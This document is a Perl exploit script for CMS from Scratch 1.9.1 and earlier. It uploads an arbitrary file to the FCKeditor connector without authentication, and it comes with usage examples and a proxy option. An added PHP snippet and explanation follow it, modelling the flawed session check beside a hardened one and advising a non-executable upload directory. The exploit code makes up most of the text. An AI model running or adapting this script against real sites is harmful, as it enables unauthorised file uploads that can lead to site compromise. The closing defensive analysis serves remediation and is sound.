CMS from Scratch <= 1.9.1 (fckeditor) Remote File Upload Exploit
Source: staker[at]hotmail[dot]it Author: staker Published: 2009-02-03
#!/usr/bin/perl
# ----------------------------------------------------------------
# CMS from Scratch <= 1.9.1 (fckeditor) Remote File Upload Exploit
# by yeat - staker[at]hotmail[dot]it
# http://scratchwebdesignforums.com/forums/index.php?showtopic=629
# ----------------------------------------------------------------
# (fckeditor/editor/filemanager/connectors/php/config.php)
# 25. global $Config ;
# 26.
# 27. $Config['Enabled'] = (isset($_SESSION['loginStatus']) ||
#     $_SESSION == NULL) ? true : false ; 
# ...
# 39. $Config['UserFilesAbsolutePath'] =
#     realpath($_SERVER['DOCUMENT_ROOT']);
# ----------------------------------------------------------------

use Getopt::Std;
use LWP::UserAgent;

getopts('p:',\my %opts);

my $http = new LWP::UserAgent;
my ($host,$file) = @ARGV;


Main::RunExploit();


# Main Package

package Main;


sub Usage {

return print <<EOF;
+------------------------------------------------------------------+
| CMS from Scratch <= 1.9.1 (fckeditor) Remote File Upload Exploit |
+------------------------------------------------------------------+
by yeat - staker[at]hotmail[dot]it

Usage: perl xpl.pl host/path file [OPTIONS]
host: target host and cms path
file: file to upload

Options:

-p [specify a proxy] [server]:[port]

Example:
perl xpl.pl localhost/cms yeat.jpg
perl xpl.pl localhost/cms yeat.jpg -p 213.151.89.109:80

EOF

}


sub RunExploit
{   
    if (defined $opts{p}) {
        HTTP::Proxy($opts{p});
    }
   
    if (@ARGV < 2 || @ARGV > 4) {
        Main::Usage();
    }
    else {   
        FileUpload::Exploit($file);
    }   
}



# File Upload Package

package FileUpload;

sub Exploit
{
    my $file = shift;
    my $path = "/fckeditor/editor/filemanager/connectors/php/upload.php?Type=File";


    my $data = { NewFile => [$file,$file] };
   
    my $send = $http->post('http://'.$host.$path,
                           $data,
                           Content_Type => 'multipart/form-data',
                          );
   
    if ($send->is_success) {
        print $send->content;
        exit;                       
    }
    else {
        print "Exploit Failed!\n";
        exit;
    }    
}  
                                



# HTTP Package

package HTTP;


sub Cookies
{
    return $http->default_header('Cookie' => $_[0]);
}


sub UserAgent
{
    return $http->agent($_[0]);
}   


sub GET
{   
    if ($_[0] !~ m{^http://(.+?)$}i) {
        return $http->get('http://'.$_[0]);
    }   
    else {
        return $http->get($_[0]);
    }   
}
   

sub http_header
{
    return $http->default_header($_[0]);
}           

   
sub Proxy
{
    return $http->proxy('http', 'http://'.$_[0]);  
}  
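
The header comment quotes the root cause: line 27 of config.php enables the connector when `loginStatus` is set or when `$_SESSION` is NULL, so a client that never started a session passes the check. The PHP below is an added example, not code from CMS from Scratch, FCKeditor or the exploit author; it models that expression next to a corrected one. The function names and sample sessions are constructed, and it assumes the CMS sets `$_SESSION['loginStatus']` to a truthy value only after a successful login.

```php
<?php
// Added example: models the 'Enabled' decision from config.php line 27 as
// pure functions so the flawed check and a corrected one can be compared.

// Original expression, with $_SESSION passed in as a parameter.
// A request with no session ($_SESSION unset, i.e. NULL) satisfies the
// second operand. An empty array also compares loosely equal to NULL.
function enabled_original(?array $session): bool
{
    return (isset($session['loginStatus']) || $session == NULL) ? true : false;
}

// Corrected check (assumption: loginStatus is truthy only after login).
// The connector is enabled only for a started session carrying that flag.
function enabled_hardened(?array $session): bool
{
    return is_array($session) && !empty($session['loginStatus']);
}

// Constructed sample sessions covering the three relevant states.
$cases = [
    'no session started' => null,
    'empty session'      => [],
    'logged-in admin'    => ['loginStatus' => true],
];

foreach ($cases as $label => $session) {
    printf(
        "%-20s original=%-5s hardened=%s\n",
        $label,
        var_export(enabled_original($session), true),
        var_export(enabled_hardened($session), true)
    );
}
```

Both unauthenticated cases return true under the original expression and false under the corrected one. Line 39 additionally roots uploads at DOCUMENT_ROOT, so pointing `UserFilesAbsolutePath` at a dedicated directory where the web server does not execute scripts limits what an uploaded file can do.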

 